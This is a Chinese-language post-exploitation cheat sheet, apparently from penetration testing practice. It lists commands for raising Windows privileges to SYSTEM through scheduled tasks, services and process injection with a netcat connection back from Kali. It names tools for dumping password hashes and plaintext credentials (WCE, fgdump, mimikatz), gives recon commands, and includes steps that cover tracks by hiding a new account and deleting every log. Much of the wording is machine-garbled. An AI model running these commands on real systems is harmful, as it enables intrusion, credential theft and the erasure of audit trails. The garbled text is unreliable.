一、本地提权Windows下的常见用户
Linux下的常见用户
Windows账户管理下令
二、Administrator提权至System下令行XP 【1】Cmd输入:at 19:39 /interactive cmd 【何时打开system权限的cmd窗口】 【2】打开使命管理器:taskmgr 【3】杀死explorer,然后重新建使命explorer,就是system Win7,8,10 • sc Create syscmd binPath= "cmd /K start" type= own type= interact//创建服务 • sc start syscmd//启动 工具SysInternal Suite里常用的工具PsExec、Pinjector等 进程注入Pinjector
Pinjector.exe -p 484 555 Kali中:nc -nv IP 555
三、暗码获取1 游览器 (主动生存) 2 根据管理器 3 暗码获取工具包 (1)pwdump localhost 获取Windows SAM数据库中加密的hash暗码 (2)WCE(从内存中获取暗码,须要管理员权限,到win7,默认情况下都可以随任意便获取暗码) Kali中/usr/share/wce/ • wce-universal.exe -l / -lv #列出uid hash • wce-universal.exe -d uid #删除 • wce-universal.exe -g aa #盘算aa的•LM/NT hash • wce-universal.exe -w #w择要包明文获取 防止WCE攻击 • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages Wdigest/tspkg这两个项删除,但体系不允许多用户输入 (3)fgdump Kali中/usr/share/windows-binaries/ 运行fgdump.exe ,天生三个文件 (4)mimikatz Kali中/usr/share/mimikazi 五、信息网络Linux• /etc/resolv.conf • /etc/passwd • /etc/shadow • whoami and who –a • ifconfig -a, iptables -L -n, ifconfig –a, netstat –r • uname –a, ps aux • dpkg -l| head Windows• ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r • net view , net view /domain • net user /domain, net user %username% /domain • net accounts, net share • net group "Domain Controllers" /domain • net share name$=C:\ /unlimited //利用下令,无穷定共享 • net user username /active:yes /domain //利用下令,域情况下启动锁定用户 windows下紧张数据库• SAM 数据库 ; 注册表文件 • %SYSTEMROOT%\repair\SAM • %SYSTEMROOT%\System32\config\RegBack\SAM • 业务数据库 ; 身份认证数据库 • 临时文件目次 • UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\ Wmic工具wmic nicconfig get ipaddress,macaddress //获取地点信息 wmic computersystem get username//检察当前账号信息 wmic netlogin get name,lastlogon//检察用户登录信息 wmic process get caption, executablepath,commandline//进程信息检察,及进程产生步伐的具体信息 wmic process where name=“calc.exe" call terminate//竣事进程 wmic os get name,servicepackmajorversion//检察体系信息 wmic product get name,version wmic product where name=“name” call uninstall /nointeractive wmic share get /ALL wmic /node:"localhost(或其他长途主机名)" path Win32_TerminalServiceSetting where allowTSConnections="0" call SetAllowTSConnections "1“//开启长途桌面 wmic nteventlog get path,filename, writeable//检察体系文件
隐蔽陈迹• 克制在登岸界面表现新建账号 • REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0 • del %WINDIR%\*.log /a/s/q/f • History • 日志 • auth.log / secure • btmp / wtmp • lastlog / faillog • 其他日志和 HIDS 等 ! |